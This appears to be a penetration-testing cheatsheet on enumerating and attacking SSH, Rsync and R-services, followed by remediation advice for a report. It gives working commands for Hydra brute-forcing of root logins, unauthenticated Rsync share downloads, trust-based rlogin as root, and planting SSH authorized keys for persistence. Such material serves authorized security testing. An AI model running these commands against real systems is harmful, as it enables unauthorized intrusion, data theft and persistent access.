🛡️ Methodology Checklist
- SSH version:
ssh-keyscan -t rsa [TARGET]+ banner grab - Test anonymous/default creds: root, admin, user
- Brute-force SSH:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[TARGET] - Rsync probe:
rsync [TARGET]::— list exposed modules - Access rsync share:
rsync [TARGET]::[MODULE]/ /tmp/loot/ - R-Services check (port 513/514):
rlogin -l root [TARGET] - Check
.rhosts//etc/hosts.equivfor trust relationships - Document all remote access paths and credentials found
🎯 Operational Context
Think Dumber First: SSH version fingerprinting leaks OS version even with banner stripping disabled. Check Rsync first —
rsync [TARGET]::lists modules without authentication. Writable Rsync module means you can plant an SSH authorized_key for instant persistent access. R-services (rsh/rlogin) are essentially authentication-free on misconfigured hosts.
When you land here: SSH/Rsync/RSH ports open. Banner grab SSH version. Try rsync [TARGET]:: immediately. If SSH key-based auth only, check /home/*/.ssh/authorized_keys and known_hosts for pivot chains. For Rsync, list modules, mount, and search for SSH keys/configs.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -sV -p22 [TARGET_IP] | Detect SSH version and banner |
git clone https://github.com/jtesta/ssh-audit.git && ./ssh-audit/ssh-audit.py [TARGET_IP] | Analyze SSH algorithms and weaknesses |
ssh -v [USER]@[TARGET_IP] | Verbose connect — list supported auth methods |
ssh -v [USER]@[TARGET_IP] -o PreferredAuthentications=password | Test if password auth is accepted |
sudo nmap -sV -p873 [TARGET_IP] | Detect Rsync service |
nc -nv [TARGET_IP] 873 | Probe Rsync — list available modules |
rsync -av --list-only rsync://[TARGET_IP]/[SHARE] | List Rsync share contents |
rsync -av rsync://[TARGET_IP]/[SHARE] ./local_copy | Download Rsync share |
sudo nmap -sV -p512,513,514 [TARGET_IP] | Detect R-Services |
rlogin [TARGET_IP] -l [USERNAME] | R-Services login (no password if trusted) |
rwho | List logged-in users (UDP 513 broadcast) |
rusers -al [TARGET_IP] | List users on remote host |
🔬 Deep Dive & Workflow
Initial Enumeration
- Nmap SSH:
sudo nmap -sV -p22 [TARGET_IP] - Run
ssh-audit.py [TARGET_IP]— check for weak algorithms, CBC ciphers, MD5 MACs -
ssh -v [USER]@[TARGET_IP]— note “Authentications that can continue” list - Check for R-Services:
sudo nmap -sV -p512,513,514 [TARGET_IP] - Check for Rsync:
sudo nmap -sV -p873 [TARGET_IP] - If Rsync found:
nc -nv [TARGET_IP] 873→ list modules, thenrsync -av --list-only rsync://[TARGET_IP]/[MODULE]
Attacks
- SSH: Password brute-force if
PasswordAuthentication yes(Hydra/Medusa) - SSH: Check for weak private keys in exposed shares/repos (RSA <2048, DSA)
- Rsync: List and download shares without auth if misconfigured
- R-Services: Check
/etc/hosts.equivand~/.rhostsfor wildcard+entries - rlogin: If
.rhostshas your IP as trusted → authenticate without password
SSH (Port 22)
Provides encrypted communication for remote command execution, file transfer, and port forwarding.
Auth methods: Password (brute-forceable) | Public Key (more secure — private key + passphrase)
Dangerous sshd_config Settings:
| Setting | Risk |
|---|---|
PasswordAuthentication yes | Brute-force susceptible |
PermitRootLogin yes | Direct root login |
PermitEmptyPasswords yes | Critical — blank passwords allowed |
Protocol 1 | SSHv1 — vulnerable to MitM |
X11Forwarding yes | Historical command injection vulnerabilities |
Rsync (Port 873)
File synchronization tool — can run standalone or over SSH.
- Standalone daemon: modules (shares) may be accessible without auth.
- Download entire share:
rsync -av rsync://[TARGET_IP]/[MODULE] ./local_copy
R-Services (Ports 512, 513, 514)
Legacy unencrypted remote tools. Trust relationships defined by IP/hostname — not password.
| Command | Daemon | Port | Description |
|---|---|---|---|
rexec | rexecd | 512 | Remote execution (password req.) |
rlogin | rlogind | 513 | Remote login (password-free if trusted) |
rsh | rshd | 514 | Remote shell |
rcp | rshd | 514 | Remote file copy |
Trust files: /etc/hosts.equiv and ~/.rhosts
- Format:
<hostname> <username> - Wildcard
+in either field = any host/user trusted = critical misconfiguration
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SSH fails ‘no matching key exchange method offered’ | Modern client rejects old algorithms on legacy target | Add to command: -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+aes128-cbc |
| Rsync connection times out despite port 873 open | rsync daemon requires specific module path | List modules first: rsync [TARGET]::; then access: rsync -av [TARGET]::[MODULE] /tmp/loot |
| Rsync lists modules but access denied | IP restriction on rsync daemon | Check if your VPN IP matches allowed range in /etc/rsyncd.conf; try from a pivot host inside the network |
| SSH login hangs at ‘debug1: SSH2_MSG_SERVICE_REQUEST sent’ | IDS/firewall dropping session post-handshake after fingerprint | Add -v for verbose; try -o ConnectTimeout=10; rotate VPN connection |
| R-services connection refused on 513/514 | rsh/rlogin service not running | Check with nmap: nmap -p 512,513,514 -sV [TARGET]; may need rsh-client package: apt install rsh-client |
📝 Reporting Trigger
Finding Title: Unauthenticated Rsync Service / R-Services Exposed
Impact: Read/write access to server filesystem via Rsync without credentials enables sensitive file exfiltration and SSH key injection for persistent access. R-services allow shell access with minimal authentication.
Root Cause: Rsync daemon configured without auth users and secrets file directives. R-services (rsh, rlogin) enabled with permissive hosts.equiv or .rhosts configuration.
Recommendation: Require authentication for all Rsync modules (auth users + secrets file). Disable R-services entirely — replace with SSH. Restrict Rsync access by IP (hosts allow = [AUTHORIZED_IP]). Disable SSH password authentication; enforce key-based auth.